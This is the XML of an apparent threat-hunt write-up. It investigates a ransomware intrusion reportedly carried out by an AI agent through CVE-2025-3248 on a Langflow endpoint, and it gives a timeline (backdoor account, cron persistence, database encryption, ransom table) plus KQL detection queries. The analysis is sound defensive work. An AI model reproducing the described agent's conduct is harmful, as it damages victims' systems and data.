              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">First admin-create attempt rejected, blank password hash</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">19:35:07</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-nacos-01</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6560" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Corrected attempt succeeds, backdoor account svc_maint created</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">19:35:32</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6560" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Docker socket queried, response not captured, probe abandoned</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">19:35:54</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6560" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cron persistence installed, every 30 minutes, langflow account</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">19:36:30</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-db-01</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6560" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">config_info encrypted in place, 1,342 rows</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">19:36:37</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-db-01</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6560" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">config_info and history tables dropped</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">19:36:44</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-db-01</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6560" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">README_RANSOM table created with payment demand</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">19:37:00</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6560" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Operation ends, encryption key printed to stdout only</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="706"/>
        <w:pBdr/>
        <w:spacing w:after="120" w:before="300"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detailed Findings: Questions, Answers, and Queries</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This section documents every question in the hunt, my answer, the supporting evidence, and the exact KQL I ran to get there. </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="707"/>
        <w:pBdr/>
        <w:spacing w:after="100" w:before="240"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Section 1: Initial Access</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="708"/>
        <w:pBdr/>
        <w:spacing w:after="80" w:before="200"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q1</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Something was requested on the web host immediately before that process started. Which endpoint?</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/api/v1/validate/code</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Syslog on ff-lf-01, 19:20:00 UTC: POST /api/v1/validate/code HTTP/1.1 200, host=langflow.flowforge.io, src=64.20.53.230, user agent python-requests/2.32.3.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Query:</w:t>
      </w:r>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="180" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="21192CC2">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Syslog</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="565C4FF9">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where Computer == "ff-lf-01"</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="5B705F58">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where TimeGenerated between (datetime(2026-07-30T19:20:00Z) .. datetime(2026-07-30T19:23:00Z))</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="7BFD05ED">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| project TimeGenerated, ProcessName, SyslogMessage</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| order by TimeGenerated asc</w:t>
            </w:r>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="999999" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="150" w:type="dxa"/>
              <w:top w:w="260" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
              <w:bottom w:w="260" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="1E2F23B0">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r/>
            <w:r>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                      <wp:extent cx="5943600" cy="1174119"/>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651579" name=""/>
                              <pic:cNvPicPr>
                                <a:picLocks noChangeAspect="1"/>
                              </pic:cNvPicPr>
                              <pic:nvPr/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId9"/>
                              <a:stretch/>
                            </pic:blipFill>
                            <pic:spPr bwMode="auto">
                              <a:xfrm rot="0" flipH="0" flipV="0">
                                <a:off x="0" y="0"/>
                                <a:ext cx="5943600" cy="11741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92.45pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                      <v:imagedata r:id="rId9" o:title=""/>
                      <o:lock v:ext="edit" rotation="t"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r/>
            <w:r/>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="708"/>
        <w:pBdr/>
        <w:spacing w:after="80" w:before="200"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q2</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The intruder names the weakness it used. Which one?</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r/>
      <w:r>
        <w:t xml:space="preserve">CVE-2025-3248</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">LLMAgentLogs_CL, actor jadepuffer-agent, session jp-7f3c9a21, 19:20:01. The agent's own reasoning log names the CVE and describes abusing Python default-argument evaluation against the unauthenticated endpoint.</w:t>
